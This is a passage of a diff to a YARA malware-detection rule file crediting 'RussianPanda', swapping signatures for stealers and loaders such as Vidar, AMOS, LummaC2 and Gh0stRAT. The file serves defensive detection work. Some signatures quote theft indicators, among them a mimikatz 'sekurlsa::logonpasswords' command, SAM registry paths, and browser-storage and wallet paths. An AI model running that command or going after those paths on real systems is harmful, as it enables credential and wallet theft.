-		3 of ( $s* ) and pe.imports ( "mscoree.dll" ) and filesize < 2MB
+		uint16( 0 ) == 0x5A4D and 5 of them
 }
-rule RUSSIANPANDA_Workersdevbackdoor_PS : FILE
+rule RUSSIANPANDA_Win_Mal_Rustydropper : FILE
 {
 	meta:
-		description = "Detects WorkersDevBackdoor PowerShell script"
+		description = "Detects RustyDropper"
 		author = "RussianPanda"
-		id = "d2b526c1-a9f5-57de-818c-99b02e778a0d"
-		date = "2023-12-15"
-		modified = "2023-12-15"
+		id = "9f217080-81e0-547a-9336-cf8ac2fadf36"
+		date = "2024-03-01"
+		modified = "2024-03-01"
 		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/WorkersDevBackdoor/WorkersDevBackdoor_PS.yar#L1-L18"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/RustyDropper/win_mal_RustyDropper.yar#L1-L12"
 		license_url = "N/A"
-		logic_hash = "c71eed8fd7a44f3018150cc6ef55d10779093ed8e4c77fd9babcf9b1b9fadfda"
+		hash = "a3a5e7011335a2284e2d4f73fd464ff129f0c9276878a054c1932bc50608584b"
+		logic_hash = "d0c76bcd1af63cc1b1fbabc3fa33e6caafd7d9c7c3780a94a1ed37eadef655d7"
 		score = 75
-		quality = 85
+		quality = 81
 		tags = "FILE"
 
 	strings:
-		$s1 = "sleep" wide
-		$s2 = "convertto-securestring" wide
-		$s3 = "System.Drawing.dll" wide
-		$s4 = "System.Web.Extensions.dll" wide
-		$s5 = "System.Windows.Forms.dll" wide
-		$s6 = "CSharp" wide
+		$s1 = {47 3a 5c 52 55 53 54 5f 44 52 4f 50 50 45 52 5f 45 58 45 5f 50 41 59 4c 4f 41 44 5c 44 52 4f 50 50 45 52 5f 4d 41 49 4e 5c}
+		$s2 = {46 45 41 54 55 52 45 5f 42 52 4f 57 53 45 52 5f 45 4d 55 4c 41 54 49 4f 4e}
 
 	condition:
-		all of ( $s* ) and filesize < 200KB
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule RUSSIANPANDA_Garystealer : FILE
+rule RUSSIANPANDA_Neptune_Loader : FILE
 {
 	meta:
-		description = "Detects GaryStealer 1-3-2024"
+		description = "Detects Neptune Loader"
 		author = "RussianPanda"
-		id = "4b0af30e-2cf1-539d-89fa-7e4e32cd6eab"
-		date = "2024-01-03"
-		modified = "2024-01-03"
-		reference = "https://cybersecurity.att.com/blogs/labs-research/behind-the-scenes-jaskagos-coordinated-strike-on-macos-and-windows"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/GaryStealer/garystealer-1-3-2024.yar#L1-L20"
+		id = "d576bf47-10bd-55d0-99b0-69c02dc87f17"
+		date = "2024-01-17"
+		modified = "2024-01-21"
+		reference = "https://github.com/RussianPanda95/Yara-Rules"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/NeptuneLoader/neptune_loader.yar#L1-L18"
 		license_url = "N/A"
-		hash = "6efa29a0f9d112cfbb982f7d9c0ddfe395b0b0edb885c2d5409b33ad60ce1435"
-		logic_hash = "f71655d0cb237c08af9c298ec9eec1ae9bd1efd50e26d61afddf9056b6883a15"
+		logic_hash = "ca54b8a624d48aa28bc727420f25e6f0fd67b193ac79443a357d88a9fe7cbdbb"
 		score = 75
-		quality = 79
+		quality = 81
 		tags = "FILE"
 
 	strings:
-		$s1 = {72 75 6e 74 69 6d 65 2e 67 6f 70 61 6e 69 63}
-		$s2 = {4c 6f 63 61 6c 20 49 50 20 41 64 64 72 65 73 73 65 73 3a 5b 70 69 63 6b 2d 66 69 72 73 74 2d 6c 62 20 25 70 5d}
-		$s3 = {70 65 72 73 69 73 74 61 6E 63 65 20 63 72 65 61 74 65 64}
-		$s4 = {C7 40 28 ?? 00 00 00}
+		$s1 = {8B C6 E8 F4 FB FF FF}
+		$s2 = {66 33 D1 66 89 54 58 FE}
+		$s3 = {7C 53 74 61 72 74 75 70 46 6F 6C 64 65 72 7C}
+		$s4 = {44 65 6C 70 68 69}
+		$t1 = {C7 [3] 0B 40 40 00 [6] A1 ?? 61 40 00}
+		$t2 = {C7 ?? 24 00 40 40 00 A1 ?? 61 40 00}
+		$t3 = {8B ?? ?? FF D0 B8}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 3 of ( $s* ) and filesize < 20MB and #s4 > 2
+		uint16( 0 ) == 0x5A4D and 3 of ( $s* ) or 2 of ( $t* ) and filesize < 6MB
 }
-rule RUSSIANPANDA_Vidar_DLL_Embedded
+rule RUSSIANPANDA_AMOS_Stealer : FILE
 {
 	meta:
-		description = "Vidar Stealer with embedded DLL dependencies"
+		description = "Detects AMOS Stealer"
 		author = "RussianPanda"
-		id = "462fe42a-2504-5e7e-ad90-2c7e54478204"
-		date = "2023-05-02"
-		modified = "2023-05-05"
+		id = "f2abe03e-7a29-514d-9125-9ec9d0875179"
+		date = "2025-03-31"
+		modified = "2025-04-11"
 		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/VidarStealer/vidar_ver3.6_3.7_dll_embedded.yar#L1-L21"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/AMOS/amos_stealer.yar#L1-L24"
 		license_url = "N/A"
-		logic_hash = "98d23523c2ab196f670dc33164954fc69a1c1692fa870a476e25d7dd3cebace2"
+		hash = "55663778a8c593b77a82ea1be072c73dd6a1d7a9567bbfbfad7d3dec9f672996"
+		logic_hash = "64bf0753e2696633ed255df9350a01cb1e75fd6e6c0d4fe48194927acf7e2363"
 		score = 75
 		quality = 85
-		tags = ""
-
-	strings:
-		$s = {50 4B 03 04 14 00 00 00 08 00 24 56 25 55 2B 6D 5C 08 39 7C 05}
-		$a1 = "https://t.me/mastersbots"
-		$a2 = "https://steamcommunity.com/profiles/76561199501059503"
-		$a3 = "%s\\%s\\Local Storage\\leveldb"
-		$a4 = "\\Autofill\\%s_%s.txt"
-		$a5 = "\\Downloads\\%s_%s.txt"
-		$a6 = "\\CC\\%s_%s.txt"
-		$a7 = "Exodus\\exodus.wallet"
-
-	condition:
-		$s and 5 of ( $a* )
-}
-rule RUSSIANPANDA_Win_Mal_Gobitloader : FILE
-{
-	meta:
-		description = "Detects GoBitLoader"
-		author = "RussianPanda"
-		id = "4ebc7987-c1b2-5682-943f-7c19a9cb6b36"
-		date = "2024-03-24"
-		modified = "2024-03-24"
-		reference = "https://www.malwarebytes.com/blog/threat-intelligence/2024/03/new-go-loader-pushes-rhadamanthys"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/GoBitLoader/win_mal_GoBitLoader.yar#L1-L13"
-		license_url = "N/A"
-		logic_hash = "66951b290bef6a6c9eef4ea674472465dfe0ec5072dce21f48b58191f7ce90e3"
-		score = 75
-		quality = 79
 		tags = "FILE"
 
 	strings:
-		$s1 = {6D 61 69 6E 2E 52 65 64 69 72 65 63 74 54 6F 50 61 79 6C 6F 61 64}
-		$s2 = {6D 61 69 6E 2E 48 6F 6C 6C 6F 77 50 72 6F 63 65 73 73}
-		$s3 = {6D 61 69 6E 2E 41 65 73 44 65 63 6F 64 65 2E 66 75 6E 63 31}
+		$op1 = {E8 ?? ?? ?? ?? E9 00 00 00 00 48 8D}
+		$op2 = {48 3B 85 68 FF FF FF 0F 83 03 01 00 00 C6 85 5F FF FF FF 00 C7 85 58 FF FF FF 00 00 00 00}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		( uint32( 0 ) == 0xfeedface or uint32( 0 ) == 0xcefaedfe or uint32( 0 ) == 0xfeedfacf or uint32( 0 ) == 0xcffaedfe or uint32( 0 ) == 0xcafebabe or uint32( 0 ) == 0xbebafeca or uint32( 0 ) == 0xcafebabf or uint32( 0 ) == 0xbfbafeca ) and ( #op1 > 5000 and $op2 )
 }
-
-rule RUSSIANPANDA_Andeloader
+rule RUSSIANPANDA_AMOS_Stealer_1 : FILE
 {
 	meta:
-		description = "Detects Ande Loader"
+		description = "Detects AMOS Stealer"
 		author = "RussianPanda"
-		id = "c08d63b6-9fef-505d-9611-9dd0403c7c7c"
-		date = "2023-12-11"
-		modified = "2023-12-11"
+		id = "481c0abc-efa6-5965-a5b8-0164229130e1"
+		date = "2025-04-11"
+		modified = "2025-04-11"
 		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/AndeLoader/ande_loader.yar#L3-L18"
-		license_url = "N/A"
-		logic_hash = "cd55153077e5cfbd84cbe5b062dbd842def245417acfea4ed6c2b1db702dcc81"
-		score = 75
-		quality = 83
-		tags = ""
-
-	strings:
-		$s1 = {59 61 6E 6F 41 74 74 72 69 62 75 74 65}
-		$s2 = "CreateShortcut" wide
-		$s3 = ".vbs" wide
-
-	condition:
-		3 of ( $s* ) and pe.imports ( "mscoree.dll" )
-}
-rule RUSSIANPANDA_Pikabot_1 : FILE
-{
-	meta:
-		description = "Detects PikaBot"
-		author = "RussianPanda"
-		id = "e740b821-69cc-5053-9f90-439b4364656f"
-		date = "2024-01-02"
-		modified = "2024-01-02"
-		reference = "https://research.openanalysis.net/pikabot/debugging/string%20decryption/2023/11/12/new-pikabot.html"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/PikaBot/Pikabot_1-2-2024.yar#L1-L16"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/AMOS/amos_stealer_4_25.yar#L1-L24"
 		license_url = "N/A"
-		logic_hash = "f2dd26c23aba72c2b6b959fb411381b7d3a7466f94bf5259f57e96e44d3ee153"
+		hash = "55663778a8c593b77a82ea1be072c73dd6a1d7a9567bbfbfad7d3dec9f672996"
+		logic_hash = "dffaf67bdfb8db07f69fb00720a6638e7a89db2acc1d848d635031a0aec5bdd3"
 		score = 75
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$s1 = {8A 04 11 30 02 42 83 EE 01 75 F5 5E C3}
-		$s2 = {C0 E9 02 C0 E0 04 [13] C0 E2 06 02 D0}
-		$s3 = {8D 53 BF 80 FA 19 0F B6 C3}
+		$op1 = {E8 ?? ?? ?? ?? EB 00 48 8D}
+		$op2 = {48 8D BD ?? ?? FF FF E8 ?? ?? 00 00 48 8D BD}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 2 of ( $s* ) and filesize < 500KB
+		( uint32( 0 ) == 0xfeedface or uint32( 0 ) == 0xcefaedfe or uint32( 0 ) == 0xfeedfacf or uint32( 0 ) == 0xcffaedfe or uint32( 0 ) == 0xcafebabe or uint32( 0 ) == 0xbebafeca or uint32( 0 ) == 0xcafebabf or uint32( 0 ) == 0xbfbafeca ) and ( #op1 > 50000 and #op2 > 4 )
 }
-rule RUSSIANPANDA_Fakebat_Powershell
+rule RUSSIANPANDA_Obfuscation_Powershell_Special_Chars
 {
 	meta:
-		description = "Detects FakeBat PowerShell scripts"
+		description = "Detects PowerShell special character obfuscation"
 		author = "RussianPanda"
-		id = "76149a6f-c370-5e48-82cc-c89b545c0aa8"
-		date = "2023-12-01"
-		modified = "2023-12-01"
-		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/FakeBat/fakebat_powershell.yar#L1-L13"
+		id = "dd2d41d4-3431-5252-adf1-d537f3b8db7e"
+		date = "2024-01-12"
+		modified = "2024-02-02"
+		reference = "https://perl-users.jp/articles/advent-calendar/2010/sym/11"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/PowerShell Obfuscation/obfuscation_powershell_special_chars.yar#L1-L15"
 		license_url = "N/A"
-		logic_hash = "df6b30d97ac6c9b248fed0d901e8a0a6ad1d855483a5006b008b839d9961092a"
+		hash = "d77efad78ef3afc5426432597ba129141952719846bc5ccd058249bb23d8a905"
+		logic_hash = "4cc4ebffe7bf712b412a060536acc51d94381d24b46e5494195ae17482076cd6"
 		score = 75
-		quality = 85
+		quality = 81
 		tags = ""
 
 	strings:
-		$s1 = "$LoadDomen/?status=start&av=" nocase
-		$s2 = "$xxx.gpg" nocase
+		$s1 = {7d 3d 2b 2b 24 7b}
+		$s2 = {24 28 20 20 29}
+		$s3 = {24 7B [1-10] 7D 20 20 2B 20 20 24}
+		$s4 = {24 7B [1-10] 7D 24 7B}
 
 	condition:
-		all of ( $s* )
+		2 of ( $s* )
 }
 rule RUSSIANPANDA_Win_Mal_Zloader : FILE
 {
@@ -160851,346 +161527,260 @@ rule RUSSIANPANDA_Win_Mal_Zloader : FILE
 	condition:
 		uint16( 0 ) == 0x5A4D and any of them
 }
-rule RUSSIANPANDA_Gh0Strat : FILE
+rule RUSSIANPANDA_Mal_Msedge_Dll_Virusloader : FILE
 {
 	meta:
-		description = "Detects Gh0stRAT"
+		description = "Detects malicious msedge.dll file"
 		author = "RussianPanda"
-		id = "db310549-feed-57b8-9ec0-232b6eda62f9"
-		date = "2024-07-09"
-		modified = "2024-07-09"
-		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/Gh0stRAT/Gh0stRAT.yar#L1-L14"
+		id = "7139ee30-de9a-5ef0-a96f-2ab9c239c6ff"
+		date = "2024-01-19"
+		modified = "2024-01-19"
+		reference = "https://blog.phylum.io/npm-package-found-delivering-sophisticated-rat/"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/virusloader/mal_msedge_dll_virusloader.yar#L1-L16"
 		license_url = "N/A"
-		hash = "678b06ecdbc9b186788cf960332566f9"
-		logic_hash = "bc4bdad83a0e23273774c3d4812cabe9fa44897c8ff2e308004e03b4f1622cd5"
+		hash = "ab2e3b07170ef1516af3af0d03388868"
+		logic_hash = "659fd5fa3121fec5bf4cceb6f3dea95bf4cbcde7441d6f11c35288d8ad75a803"
 		score = 75
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$s1 = "SAM\\SAM\\Domains\\Account\\Users\\Names\\%s"
-		$s2 = "GetMP privilege::debug sekurlsa::logonpasswords exit"
-		$s3 = "Http/1.1 403 Forbidden"
-		$s4 = "WinSta0\\Default"
+		$s1 = {C6 85 ?? FE FF FF ?? C6}
+		$s2 = {C7 85 ?? FD FF FF}
+		$s3 = {BF 60 01 00 00 [18] 30 04 39 41}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		uint16( 0 ) == 0x5A4D and all of ( $s* ) and #s1 > 30 and #s2 > 30 and filesize < 300KB
 }
-
-rule RUSSIANPANDA_Purecrypter_Core : FILE
+rule RUSSIANPANDA_Lummac2 : FILE
 {
 	meta:
-		description = "Detects PureCrypter Core payload"
+		description = "Detects LummaC2 Stealer"
 		author = "RussianPanda"
-		id = "41aaa187-0fb5-53fe-a162-8d1a4974ccc1"
-		date = "2024-01-09"
-		modified = "2024-01-09"
-		reference = "https://www.zscaler.com/blogs/security-research/technical-analysis-purecrypter"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/PureCrypter/purecrypter_core.yar#L3-L28"
+		id = "94d6b63f-066e-59d2-9d14-24c5d5219ba8"
+		date = "2024-09-12"
+		modified = "2024-09-12"
+		reference = "https://github.com/RussianPanda95/Yara-Rules"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/LummaC2/LummaC2.yar#L1-L14"
 		license_url = "N/A"
-		hash = "e4faa7d7a098414449abffb210fd874798207ee9d27643c8088676ff429b56b7"
-		logic_hash = "8c761a98369436ffbe1379152461753778985a42ae656567018b47c71af7d866"
+		hash = "988f54f9694dd1ae701bacec3b83c752"
+		logic_hash = "875709f48ff93c8e986f3c1d2e32268bf3458d870082072e7727d8ec85b1a021"
 		score = 75
-		quality = 81
+		quality = 85
 		tags = "FILE"
 
 	strings:
-		$s1 = {47 5A 69 70 53 74 72 65 61 6D}
-		$s2 = {41 73 73 65 6D 62 6C 79 4C 6F 61 64 65 72 00 43 6F 73 74 75 72 61}
-		$s3 = {44 65 66 6C 61 74 65 53 74 72 65 61 6D}
-		$cnct = {72 ?? ?? 00 70 28 FB 00 00 0A 72 ?? ?? 00 70 28 ?? 00 00 0A}
-		$nr1 = {7B 00 31 00 31 00 31 00 31 00 31 00 2D 00 32 00 32 00 32 00 32 00 32 00 2D 00 34 00 30 00 30 00 30 00 31 00 2D 00 30 00 30 00 30 00 30 00 31 00 7D}
-		$nr2 = {7B 00 31 00 31 00 31 00 31 00 31 00 2D 00 32 00 32 00 32 00 32 00 32 00 2D 00 34 00 30 00 30 00 30 00 31 00 2D 00 30 00 30 00 30 00 30 00 32 00 7D}
-		$nr3 = {7B 00 31 00 31 00 31 00 31 00 31 00 2D 00 32 00 32 00 32 00 32 00 32 00 2D 00 32 00 30 00 30 00 30 00 31 00 2D 00 30 00 30 00 30 00 30 00 32 00 7D}
-		$nr4 = {7B 00 31 00 31 00 31 00 31 00 31 00 2D 00 32 00 32 00 32 00 32 00 32 00 2D 00 32 00 30 00 30 00 30 00 31 00 2D 00 30 00 30 00 30 00 30 00 31 00 7D}
+		$s1 = {0F B6 [2-6] 83 ?? 1F}
+		$s2 = {F3 A5 8B 74 24 F8 8B 7C 24 F4 8D 54 24 04 FF 54 24 FC C3}
 
 	condition:
-		filesize < 5MB and all of ( $s* ) and dotnet.number_of_resources > 4 and dotnet.number_of_resources < 6 and 2 of ( $nr* ) and dotnet.assembly_refs [ 1 ] . name contains "protobuf-net" and #cnct > 5
+		uint16( 0 ) == 0x5A4D and all of them
 }
-
-rule RUSSIANPANDA_Purecrypter : FILE
+rule RUSSIANPANDA_Prysmax_Stealer : FILE
 {
 	meta:
-		description = "Detects PureCrypter"
+		description = "Detects Prysmax Stealer"
 		author = "RussianPanda"
-		id = "5670772c-ada1-55fa-b7fd-9dadd1756259"
+		id = "97ab92b8-1771-5881-9cd1-d8ff76b8f380"
 		date = "2024-01-09"
-		modified = "2024-01-09"
-		reference = "https://www.zscaler.com/blogs/security-research/technical-analysis-purecrypter"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/PureCrypter/purecrypter.yar#L3-L22"
-		license_url = "N/A"
-		hash = "566d8749e166436792dfcbb5e5514f18c9afc0e1314833ac2e3d86f37ff2030f"
-		logic_hash = "dd8592fa0b7d240d23235008601500a20e068032f6dcd6e90a38b06ac747b8af"
-		score = 75
-		quality = 83
-		tags = "FILE"
-
-	strings:
-		$s1 = {28 ?? 00 00 ?? 28 02 00 00 2B 28 ?? 00 00 (0A|06)}
-		$s2 = {73 ?? 00 00 0A}
-		$s3 = {73 ?? 00 00 06 6F ?? 00 00 06}
-		$s4 = {52 65 73 6F 75 72 63 65 4D 61 6E 61 67 65 72}
-		$s5 = {28 ?? 00 00 ?? 6F ?? 00 00 0A 28 03 00 00 2B ?? 6F ?? 00 00 0A 28 ?? 00 00 2B}
-
-	condition:
-		filesize < 6MB and 4 of ( $s* ) and dotnet.number_of_resources > 0 and dotnet.number_of_resources < 2 and dotnet.resources [ 0 ] . length > 300KB
-}
-rule RUSSIANPANDA_Solarphantom : FILE
-{
-	meta:
-		description = "SolarPhantom Backdoor Detection"
-		author = "RussianPanda"
-		id = "f564a943-e83b-5c1b-ba8c-b227d69d3fd8"
-		date = "2023-12-11"
-		modified = "2023-12-11"
-		reference = "https://www.esentire.com/blog/solarmarker-to-jupyter-and-back"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/SolarMarker/solarphantom.yar#L1-L16"
+		modified = "2024-01-10"
+		reference = "https://www.cyfirma.com/outofband/new-maas-prysmax-launches-fully-undetectable-infostealer/"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/Prysmax Stealer/prysmax_stealer.yar#L1-L21"
 		license_url = "N/A"
-		logic_hash = "3b49d301e625d5abf1b726481a80d6a97d33acd3301c12964f2f37d37130c1b7"
+		logic_hash = "869eee7dd5209bdea98c248791b9ac911e3daabe6d440aa62aecefa43539a41c"
 		score = 75
-		quality = 83
+		quality = 73
 		tags = "FILE"
 
 	strings:
-		$p1 = {B8 94 E3 46 00 E8 C6 EB FA FF 8B 45 F8}
-		$p2 = {68 E8 EF 46 00 FF 75 E4}
-		$p3 = {62 72 76 70 72 66 5f 62 6b 70}
+		$a1 = {23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23}
+		$s2 = {73 70 72 79 73 6D 61 78}
+		$s3 = {56 43 52 55 4E 54 49 4D 45 31 34 30 2E 64 6C 6C}
+		$s4 = {56 43 52 55 4E 54 49 4D 45 31 34 30 5F 31 2E 64 6C 6C}
+		$s5 = {4D 53 56 43 50 31 34 30 2E 64 6C 6C}
+		$s6 = {50 79 49 6E 73 74 61 6C 6C 65 72}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 1 of ( $p* ) and filesize < 600KB
+		all of ( $s* ) and uint16( 0 ) == 0x5A4D and $a1 in ( 9600000 .. filesize ) and #a1 > 600 and filesize > 60MB and filesize < 200MB
 }
-rule RUSSIANPANDA_Solarmarker_First_Stage_Payload : FILE
+rule RUSSIANPANDA_Win_Mal_Planetstealer : FILE
 {
 	meta:
-		description = "Detects SolarMarker First Stage payload"
+		description = "Detects PlanetStealer"
 		author = "RussianPanda"
-		id = "56eec644-9ad7-51db-9d11-68ea3e12c36a"
-		date = "2024-01-30"
-		modified = "2024-01-30"
-		reference = "https://x.com/luke92881/status/1751968350689771966?s=20"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/SolarMarker/solarmarker_first_stage_payload.yar#L1-L21"
+		id = "f912066f-4151-5f83-8d34-6bffdf9e25e5"
+		date = "2024-03-04"
+		modified = "2024-03-24"
+		reference = "https://github.com/RussianPanda95/Yara-Rules"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/PlanetStealer/win_mal_PlanetStealer.yar#L1-L14"
 		license_url = "N/A"
-		hash = "f53563541293a826738d3b8f1164ea43"
-		logic_hash = "e704614782b0f3cba60c53413e889113d2d44f37e60801205e5ed5ff921b13ee"
+		logic_hash = "e1660d6fed4c48b45b40bd51fb52254c5b19ca6f1938b68f2344bde473820b86"
 		score = 75
-		quality = 71
+		quality = 79
 		tags = "FILE"
 
 	strings:
-		$s1 = {63 72 65 64 75 69}
-		$s2 = {43 72 65 64 55 49 50 72 6F 6D 70 74 46 6F 72 43 72 65 64 65 6E 74 69 61 6C 73}
-		$s3 = {50 6F 77 65 72 53 68 65 6C 6C}
-		$s4 = {73 65 74 5F 43 75 72 73 6F 72 50 6F 73 69 74 69 6F 6E}
-		$s5 = {73 65 74 5F 41 63 63 65 70 74 42 75 74 74 6F 6E}
-		$s6 = {4D 65 73 73 61 67 65 42 6F 78 42 75 74 74 6F 6E 73}
-		$s7 = {41 67 69 6C 65 44 6F 74 4E 65 74 52 54}
-		$s8 = "_CorExeMain"
+		$s1 = {48 8D 15 ?? ?? ?? 00 0F B6 34 10 0F B6 BC 04 ?? ?? 00 00 ?? ?? 40 88 ?? 04 ?? ?? 00 00 48 FF C0}
+		$s2 = {48 83 F8 ?? 7C DA}
+		$s3 = {72 75 6E 74 69 6D 65 2E 67 6F 62 75 66}
+		$s4 = {74 6F 74 61 6C 5F 77 61 6C 6C 65 74 73}
+		$s5 = {74 6F 74 61 6C 5F 63 6F 6F 6B 69 65 73}
 
 	condition:
-		all of them and filesize > 250MB
+		uint16( 0 ) == 0x5A4D and all of them and #s2 > 100 and #s1 > 100 and filesize < 20MB
 }
-rule RUSSIANPANDA_Solardropper
+rule RUSSIANPANDA_Aurorastealer_1
 {
 	meta:
-		description = "SolarMarker first stage detection"
+		description = "Detects the Build/Group IDs if present / detects an unobfuscated AuroraStealer binary; tested on version 22.12.2022"
 		author = "RussianPanda"
-		id = "8e40b001-ae00-5768-bb91-e45264748087"
-		date = "2024-01-03"
-		modified = "2024-01-03"
-		reference = "https://www.esentire.com/blog/solarmarker-to-jupyter-and-back"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/SolarMarker/solardropper.yar#L1-L15"
+		id = "1a94096f-c838-5272-856e-42efbd123a31"
+		date = "2023-02-07"
+		modified = "2023-05-05"
+		reference = "https://github.com/RussianPanda95/Yara-Rules"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/AuroraStealer/AuroraStealer.yar#L1-L16"
 		license_url = "N/A"
-		logic_hash = "5dccb7be94e814335c0c867f8b3dd8855043375fe9f1235d5519c690fc7df842"
-		score = 75
+		logic_hash = "7a9900266a0dfa7bf0ea91a0260a1d30bd7799a491fba87db083f4fea4115f2a"
+		score = 50
 		quality = 85
 		tags = ""
 
 	strings:
-		$p1 = {2d 00 71 00 71 00 78 00 74 00 72 00 61 00 63 00 74 00 3a 00 22 00 3c 00 66 00 69 00 6c 00 71 00 71 00 6e 00 61 00 6d 00 71 00 71 00 3e 00 22 00}
-		$p2 = "deimos.exe"
-		$p3 = {5e 00 2d 00 28 00 5b 00 5e 00 3a 00 20 00 5d 00 2b 00 29 00 5b 00 20 00 3a 00 5d 00 3f 00 28 00 5b 00 5e 00 3a 00 5d 00 2a 00 29 00 24 00}
-
-	condition:
-		all of ( $p* )
-}
-
-rule RUSSIANPANDA_Solarmarker_Loader : FILE
-{
-	meta:
-		description = "Detects SolarMarker loader 1-4-2024"
-		author = "RussianPanda"
-		id = "b385fcd4-62b7-5a83-8a2e-6841fdd17526"
-		date = "2024-01-04"
-		modified = "2024-01-04"
-		reference = "https://www.esentire.com/blog/solarmarker-to-jupyter-and-back"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/SolarMarker/solarmarker_backdoor.yar#L3-L19"
-		license_url = "N/A"
-		hash = "8eeefe0df0b057fc866b8d35625156de"
-		logic_hash = "035eccb41f2ecdeb196003542c165cedad96e3e8e741511b4beda3dfe1ece74e"
-		score = 75
-		quality = 85
-		tags = "FILE"
-
-	strings:
-		$s1 = {06 [0-7] 58 D1 8C [3] 01 28 [3] 0A 0A}
+		$b1 = { 48 8D 0D ?? ?? 04 00 E8 ?? ?? EF FF }
+		$go = "Go build ID"
+		$machineid = "MachineGuid"
 
 	condition:
-		all of ( $s* ) and #s1 > 5 and filesize < 7MB and pe.imports ( "mscoree.dll" )
+		all of them
 }
-rule RUSSIANPANDA_Solarmarker_Loader_PS2EXE : FILE
+rule RUSSIANPANDA_Aurorastealer_March_2023
 {
 	meta:
-		description = "Detects SolarMarker loader using PS2EXE"
+		description = "Detects an unobfuscated AuroraStealer March update binary"
 		author = "RussianPanda"
-		id = "837883a1-b657-52ae-95c4-ebafc8ac55de"
-		date = "2024-01-04"
-		modified = "2024-01-04"
-		reference = "https://www.esentire.com/blog/solarmarker-to-jupyter-and-back"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/SolarMarker/solarmarker_loader.yar#L1-L17"
+		id = "a115de7a-bff7-5bb0-b83f-f66a29bbcf3f"
+		date = "2023-03-23"
+		modified = "2023-05-05"
+		reference = "https://github.com/RussianPanda95/Yara-Rules"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/AuroraStealer/Aurora_March_2023.yar#L1-L15"
 		license_url = "N/A"
-		hash = "b45c31679c2516b38c7ff8c395f1d11d"
-		logic_hash = "4f579f350c3320e7b811cae0efe7302e852f59adc02d805f64ba464f8a995f25"
+		logic_hash = "d74d2843a03e826f334ce3c5eb10cc2b43cfd832174769e5d067fb877abe13a0"
 		score = 75
 		quality = 85
-		tags = "FILE"
-
-	strings:
-		$s1 = {72 7B 02 00 70 72 89 02 00 70 72 91 02 00 70 [22] 72 97 02 00 70 72 AB 02 00 70 72 B5 02 00 70}
-		$s2 = {13 0D 72 [3] 70}
-		$s3 = {72 C1 02 00 70 72 B2 03 00 70 72 B8 03 00 70}
-
-	condition:
-		all of ( $s* ) and filesize > 200MB
-}
-rule RUSSIANPANDA_Obfuscation_Powershell_Special_Chars
-{
-	meta:
-		description = "Detects PowerShell special character obfuscation"
-		author = "RussianPanda"
-		id = "dd2d41d4-3431-5252-adf1-d537f3b8db7e"
-		date = "2024-01-12"
-		modified = "2024-02-02"
-		reference = "https://perl-users.jp/articles/advent-calendar/2010/sym/11"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/PowerShell Obfuscation/obfuscation_powershell_special_chars.yar#L1-L15"
-		license_url = "N/A"
-		hash = "d77efad78ef3afc5426432597ba129141952719846bc5ccd058249bb23d8a905"
